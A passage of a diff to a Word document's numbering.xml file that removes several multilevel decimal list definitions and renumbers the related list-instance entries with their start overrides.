-      <w:lvlText w:val="%3."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2268" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3">
-      <w:start w:val="3"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%4."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2835" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4">
-      <w:start w:val="3"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%5."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3402" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5">
-      <w:start w:val="3"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%6."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3969" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6">
-      <w:start w:val="3"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%7."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="4536" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7">
-      <w:start w:val="3"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%8."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5103" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8">
-      <w:start w:val="3"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%9."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5670" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-  </w:abstractNum>
-  <w:abstractNum w:abstractNumId="99414">
-    <w:nsid w:val="00A99414"/>
-    <w:multiLevelType w:val="multilevel"/>
-    <w:lvl w:ilvl="0">
-      <w:start w:val="4"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%1."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1134" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1">
-      <w:start w:val="4"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%2."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1701" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2">
-      <w:start w:val="4"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%3."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2268" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3">
-      <w:start w:val="4"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%4."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2835" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4">
-      <w:start w:val="4"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%5."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3402" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5">
-      <w:start w:val="4"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%6."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3969" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6">
-      <w:start w:val="4"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%7."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="4536" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7">
-      <w:start w:val="4"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%8."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5103" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8">
-      <w:start w:val="4"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%9."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5670" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-  </w:abstractNum>
-  <w:abstractNum w:abstractNumId="99415">
-    <w:nsid w:val="00A99415"/>
-    <w:multiLevelType w:val="multilevel"/>
-    <w:lvl w:ilvl="0">
-      <w:start w:val="5"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%1."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1134" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1">
-      <w:start w:val="5"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%2."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1701" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2">
-      <w:start w:val="5"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%3."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2268" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3">
-      <w:start w:val="5"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%4."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2835" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4">
-      <w:start w:val="5"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%5."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3402" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5">
-      <w:start w:val="5"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%6."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3969" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6">
-      <w:start w:val="5"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%7."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="4536" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7">
-      <w:start w:val="5"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%8."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5103" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8">
-      <w:start w:val="5"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%9."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5670" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-  </w:abstractNum>
-  <w:abstractNum w:abstractNumId="99416">
-    <w:nsid w:val="00A99416"/>
-    <w:multiLevelType w:val="multilevel"/>
-    <w:lvl w:ilvl="0">
-      <w:start w:val="6"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%1."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1134" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1">
-      <w:start w:val="6"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%2."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1701" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2">
-      <w:start w:val="6"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%3."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2268" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3">
-      <w:start w:val="6"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%4."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2835" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4">
-      <w:start w:val="6"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%5."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3402" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5">
-      <w:start w:val="6"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%6."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3969" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6">
-      <w:start w:val="6"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%7."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="4536" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7">
-      <w:start w:val="6"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%8."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5103" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8">
-      <w:start w:val="6"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%9."/>
       <w:lvlJc w:val="left"/>
@@ -7725,129 +7720,9 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="1005">
-    <w:abstractNumId w:val="99413"/>
-    <w:lvlOverride w:ilvl="0">
-      <w:startOverride w:val="3"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="1">
-      <w:startOverride w:val="3"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="2">
-      <w:startOverride w:val="3"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="3">
-      <w:startOverride w:val="3"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="4">
-      <w:startOverride w:val="3"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="5">
-      <w:startOverride w:val="3"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="6">
-      <w:startOverride w:val="3"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="7">
-      <w:startOverride w:val="3"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="8">
-      <w:startOverride w:val="3"/>
-    </w:lvlOverride>
+    <w:abstractNumId w:val="991"/>
   </w:num>
   <w:num w:numId="1006">
-    <w:abstractNumId w:val="99414"/>
-    <w:lvlOverride w:ilvl="0">
-      <w:startOverride w:val="4"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="1">
-      <w:startOverride w:val="4"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="2">
-      <w:startOverride w:val="4"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="3">
-      <w:startOverride w:val="4"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="4">
-      <w:startOverride w:val="4"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="5">
-      <w:startOverride w:val="4"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="6">
-      <w:startOverride w:val="4"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="7">
-      <w:startOverride w:val="4"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="8">
-      <w:startOverride w:val="4"/>
-    </w:lvlOverride>
-  </w:num>
-  <w:num w:numId="1007">
-    <w:abstractNumId w:val="99415"/>
-    <w:lvlOverride w:ilvl="0">
-      <w:startOverride w:val="5"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="1">
-      <w:startOverride w:val="5"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="2">
-      <w:startOverride w:val="5"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="3">
-      <w:startOverride w:val="5"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="4">
-      <w:startOverride w:val="5"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="5">
-      <w:startOverride w:val="5"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="6">
-      <w:startOverride w:val="5"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="7">
-      <w:startOverride w:val="5"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="8">
-      <w:startOverride w:val="5"/>
-    </w:lvlOverride>
-  </w:num>
-  <w:num w:numId="1008">
-    <w:abstractNumId w:val="99416"/>
-    <w:lvlOverride w:ilvl="0">
-      <w:startOverride w:val="6"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="1">
-      <w:startOverride w:val="6"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="2">
-      <w:startOverride w:val="6"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="3">
-      <w:startOverride w:val="6"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="4">
-      <w:startOverride w:val="6"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="5">
-      <w:startOverride w:val="6"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="6">
-      <w:startOverride w:val="6"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="7">
-      <w:startOverride w:val="6"/>
-    </w:lvlOverride>
-    <w:lvlOverride w:ilvl="8">
-      <w:startOverride w:val="6"/>
-    </w:lvlOverride>
-  </w:num>
-  <w:num w:numId="1009">
-    <w:abstractNumId w:val="991"/>
-  </w:num>
-  <w:num w:numId="1010">
     <w:abstractNumId w:val="99411"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
@@ -7877,7 +7752,7 @@
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
-  <w:num w:numId="1011">
+  <w:num w:numId="1007">
     <w:abstractNumId w:val="99411"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
@@ -7907,7 +7782,7 @@
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
-  <w:num w:numId="1012">
+  <w:num w:numId="1008">
     <w:abstractNumId w:val="99411"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
